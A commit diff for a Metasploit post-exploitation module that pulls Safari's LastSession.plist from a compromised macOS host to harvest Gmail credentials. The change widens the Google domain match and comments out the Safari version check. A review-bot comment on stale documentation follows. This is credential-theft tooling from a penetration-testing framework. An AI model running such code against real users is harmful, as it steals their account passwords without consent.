Land #2798, @wchen-r7 update to safari post module

bug/bundler_fix
jvazquez-r7 2013-12-25 10:24:39 -06:00
commit c2783c2746
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 15 additions and 9 deletions


@ -15,10 +15,14 @@ class Metasploit3 < Msf::Post
'Name' => 'OSX Gather Safari LastSession.plist',
'Description' => %q{
This module downloads the LastSession.plist file from the target machine.
LastSession.plist is used by Safari to track active websites in the current
session, and sometimes contains sensitive information such as usernames and
passwords. This module will first download the original LastSession.plist,
and then attempt to find the credential for Gmail.
LastSession.plist is used by Safari to track active websites in the current session,
and sometimes contains sensitive information such as usernames and passwords.
This module will first download the original LastSession.plist, and then attempt
to find the credential for Gmail. The Gmail's last session state may contain the
user's credential if his/her first login attempt failed (likely due to a typo),
and then the page got refreshed or another login attempt was made. This also means
the stolen credential might contains typos.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r'],
@ -111,16 +115,16 @@ class Metasploit3 < Msf::Post
#
# Returns the <dict> session element
# @param xml [REXML::Element] The array element for the session data
# @param domain [String] The domain to search for
# @param domain [Regexp] The domain to search for
# @return [REXML::Element] The <dict> element for the session data
#
def get_session_element(xml, domain)
def get_session_element(xml, domain_regx)
dict = nil
found = false
xml.each_element do |e|
e.elements['array/dict'].each_element do |e2|
if e2.text =~ /#{domain}/
if e2.text =~ domain_regx
dict = e
found = true
break
@ -141,7 +145,7 @@ class Metasploit3 < Msf::Post
#
def find_gmail_cred(xml)
vprint_status("#{peer} - Looking for username/password for Gmail.")
gmail_dict = get_session_element(xml, 'mail.google.com')
gmail_dict = get_session_element(xml, /(mail|accounts)\.google\.com/)
return '' if gmail_dict.nil?
raw_data = gmail_dict.elements['array/dict/data'].text
@ -179,6 +183,7 @@ class Metasploit3 < Msf::Post
#
# If this is an unpatched version, we try to extract creds
#
=begin
version = get_safari_version
if version.blank?
print_warning("Unable to determine Safari version, will try to extract creds anyway")
@ -188,6 +193,7 @@ class Metasploit3 < Msf::Post
else
vprint_status("#{peer} - Safari version: #{version}")
end
=end
#
# Attempts to convert the XML file to an actual XML object, with the <array> element
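Review bot: In the second hunk the YARD tag still reads `# @param domain [Regexp]` although the parameter was renamed to `domain_regx`, so the documentation names a parameter the method no longer has; it should read `# @param domain_regx [Regexp] Pattern matched against each session entry's text`. In the last two hunks the Safari version check appears to be disabled by wrapping it in `=begin`/`=end`, yet the comment above it (`If this is an unpatched version, we try to extract creds`) is kept and now describes a gate that no longer runs. Either delete the dead block or add a one-line comment above `=begin` saying why the check is off and under what condition it should return. The bodies of `get_session_element` and `find_gmail_cred` continue outside the visible hunks, so whether `get_safari_version` is still used elsewhere cannot be confirmed from here.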